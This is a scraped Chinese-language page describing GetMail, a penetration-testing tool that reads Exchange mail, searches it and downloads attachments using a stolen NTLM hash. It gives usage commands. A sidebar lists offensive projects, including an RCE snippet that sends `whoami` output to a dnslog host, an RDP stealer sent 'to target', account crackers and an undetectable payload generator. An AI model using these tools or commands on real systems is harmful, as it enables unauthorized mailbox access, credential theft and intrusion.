利用NTLM Hash读取Exchange邮件

Related tags

Security related resourcesGetMail
Overview

GetMail

利用NTLM Hash读取Exchange邮件:在进行内网渗透时候,我们经常拿到的是账号的Hash凭据而不是明文口令。在这种情况下采用邮件客户端或者WEBMAIL的方式读取邮件就很麻烦,需要进行破解,NTLM的破解主要依靠字典强度,破解概率并不是很大。其实Exchange提供了利用NTLM Hash凭据进行验证的方法,从而可以进行任何操作。本程序支持邮箱目录结构的列举、邮件的阅读、附件的下载、关键字的搜索等功能,支持明文密码和NTLM Hash凭证两种认证方式。

参数介绍

  • -h, --help show this help message and exit
  • -u USER, --user=USER Please Input Username!
  • -H HASH, --hash=HASH Please Input Ntlmhash: xx:xx Or xxxx!
  • -p PSWD, --pswd=PSWD Please Input Password!
  • -e EMAIL, --email=EMAIL Please Input Email Address!
  • -c COUNT, --count=COUNT Please Input How Many Emails You Want To Read!
  • -s SERVER, --server=SERVER Please Input Email Server Address!
  • -k KEYWORD, --keyword=KEYWORD Please Input Keyword To Search!
  • -L, --List List All Email Floders!
  • -D, --download Whether Download Attachment Files Or Not!
  • -d, --display Show All Email Floders!
  • -l, --list List All Email Floders!
  • -f FLODER, --folder=FLODER Please Input Email Floder Name!

使用

列举邮箱目录结构

python3 getmail.py -u [USERNAME] -p [PASSWORD] -e [EMAIL ADDRESS] -L
python3 getmail.py -u [USERNAME] -H [NTLMHASH] -e [EMAIL ADDRESS] -L

阅读邮件

python3 getmail.py -u [USERNAME] -H [NTLMHASH] -e [EMAIL ADDRESS] -f [文件夹,默认是Inbox] -c 阅读邮件数量(按照时间倒序,最近的在最前面)
python3 getmail.py -u [USERNAME] -H [NTLMHASH] -e [EMAIL ADDRESS] -f [文件夹,默认是Inbox] -c 阅读邮件数量(按照时间倒序,最近的在最前面) -k [Keyword](展示包含关键字的邮件)

下载附件

python3 getmail.py -u [USERNAME] -H [NTLMHASH] -e [EMAIL ADDRESS] -f [文件夹,默认是Inbox] -c 阅读邮件数量(按照时间倒序,最近的在最前面)——D

ISSUE修复记录

  • 0x01 默认Inbox收件箱邮件阅读超过20封时候有会问题【已修复】
  • 0x02 同名附件自动下载导致附件覆盖问题【已修复】

Changelog

  • v1.1 20210421
    • 支持展示抄送、密送
    • 优化展示效果
    • 修复一些bug
  • v1.1 20210422 增加GUI版本
    • Mac测试通过 image

























Owner









[email protected]



Information Security Engineer



<a href=[email protected]">




 GitHub Repository









Exploiting CVE-2021-44228 in vCenter for remote code execution and more


 Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P






 81  Dec 20, 2022









Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.


 Log4jScanner Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains. Disc





Pushpender Singh
 35  Dec 12, 2022









SEBUAH TOOLS TERMUX CRACK AKUN FF HOMKI AKUN EPEP DAH SATU FOLLOW AE YA BROO AWOKWOK


 print " INSTALL TOOLS " $ pkg update && upgrade $ pkg install python2 $ pkg install git $ pip2 install lolcat $ pip2 install bs4 $ pip2 install reques





Jeeck
 2  Nov 29, 2021









neo Tool is great one in binary exploitation topic


 neo Tool is great one in binary exploitation topic. instead of doing several missions by many tools and windows, you can now automate this in one tool in one session.. Enjoy it





Hamza Elansari
 4  Oct 10, 2022









Script Crack Facebook Yang Kaya Akan Teh Hijau 🚶‍♂


 r-mbf Script Crack Facebook 🚶‍♂ Bukti Recode [•] Install Script $ pkg update && pkg upgrade $ pkg install python $ pkg install git $ pip install requ





O'Hayo Smrn
 3  Apr 02, 2022









A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries


 A Python Bytecode Disassembler helping reverse engineers in dissecting Python binaries by disassembling and analyzing the compiled python byte-code(.pyc) files across all python versions (including P





neeraj
 95  Dec 26, 2022









This repository uses a mixture of numbers, alphabets, and other symbols found on the computer keyboard


 This repository uses a mixture of numbers, alphabets, and other symbols found on the computer keyboard to form a 16-character password which is unpredictable and cannot easily be memorised.





Mohammad Shaad Shaikh
 1  Nov 23, 2021









CVE-2021-22205 Unauthorized RCE


 CVE-2021-22205 影响版本: Gitlab CE/EE 13.10.3 Gitlab CE/EE 13.9.6 Gitlab CE/EE 13.8.8 Usage python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog





r0eXpeR
 70  Nov 09, 2022









A Python Scanner for log4j


 log4j-Scanner scanner for log4j cat web-urls.txt | python3 log4j.py ID.burpcollaborator.net
web-urls.txt http://127.0.0.1:8080
https://www.google.c





Ihebski
 5  Jun 26, 2022









Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify


 Script hecho en python para sacar la informacion del numero de telefono, Hecha con el API de numverify





DW Dariel
 5  Dec 03, 2022









Laravel RCE (CVE-2021-3129)


 CVE-2021-3129 - Laravel RCE About The script has been made for exploiting the Laravel RCE (CVE-2021-3129) vulnerability. This script allows you to wri





Joshua van der Poll
 21  Dec 27, 2022









Moodle community-based vulnerability scanner


 badmoodle Moodle community-based vulnerability scanner Description badmoodle is an unofficial community-based vulnerability scanner for moodle that sc





Michele Di Bonaventura
 11  Dec 22, 2022









This is a Crypto asset tracker that I built to aid my personal journey in cryptocurrencies.


 Wallet Tracker This is a Crypto asset tracker that I built to aid my personal journey in cryptocurrencies. build docker build -t wallet-tracker .
run






 2  Mar 21, 2022









RDP Stealer


 RDP Stealer RDP Stealer by lamp Require Python How To Use Download This Source Extract The Zip File Change webhook url Convert to exe send to target I





Lamp
 14  Nov 26, 2022









Searches through git repositories for high entropy strings and secrets, digging deep into commit history


 truffleHog Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accident





Truffle Security
 10.1k  Jan 09, 2023









PyFUD - Fully Undetectable payload generator for metasploit


 PyFUD fully Undetectable payload generator for metasploit Usage: pyfud.py --host






 3  Mar 25, 2022









PyPasser is a Python library for bypassing reCaptchaV3 only by sending 2 requests. 


 PyPasser is a Python library for bypassing reCaptchaV3 only by sending 2 requests. In 1st request, gets token of captcha and in 2nd request, 






 253  Jan 05, 2023









A (completely native) python3 wifi brute-force attack using the 100k most common passwords (2021)


 wifi-bf [LINUX ONLY] A (completely native) python3 wifi brute-force attack using the 100k most common passwords (2021) This script is purely for educa





Finn Lancaster
 20  Nov 12, 2022









Pgen is the best brute force password generator and it is improved from the cupp.py


 pgen Pgen is the best brute force password generator and it is improved from the cupp.py The pgen tool is dedicated to Leonardo da Vinci -Time stays l





heyheykids
 2  Jan 31, 2022









Dlint is a tool for encouraging best coding practices and helping ensure Python code is secure.


 Dlint Dlint is a tool for encouraging best coding practices and helping ensure Python code is secure. The most important thing I have done as a progra





Dlint
 127  Dec 27, 2022